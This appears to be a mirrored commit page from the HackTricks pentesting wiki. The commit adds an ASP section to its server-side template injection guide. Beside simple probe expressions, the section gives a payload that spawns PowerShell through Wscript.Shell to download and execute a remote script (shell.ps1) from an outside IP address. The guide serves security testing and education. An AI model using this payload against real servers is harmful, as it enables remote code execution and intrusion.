0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [#2986] No subject

Browse source
This commit is contained in:
CPol 2022-02-03 15:39:58 +00:00 committed by gitbook-bot
parent 8e9f19eec9
commit 6e5cd29dfd
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 15 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

15
pentesting-web/ssti-server-side-template-injection/README.md
View file

@ -796,6 +796,21 @@ ${x}
* [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-\(SSTI\)-in-ASP.NET-Razor/)
* [https://www.schtech.co.uk/razor-pages-ssti-rce/](https://www.schtech.co.uk/razor-pages-ssti-rce/)
### ASP
* `<%= 7*7 %>` = 49
* `<%= "foo" %>` = foo
* `<%= foo %>` = Nothing
* `<%= response.write(date()) %>` = \<Date>
```bash
<%= CreateObject("Wscript.Shell").exec("powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.14.11:8000/shell.ps1')").StdOut.ReadAll() %>
```
#### More Information
* [https://www.w3schools.com/asp/asp\_examples.asp](https://www.w3schools.com/asp/asp\_examples.asp)
### Mojolicious (Perl)
Even if it's perl it uses tags like ERB in Ruby.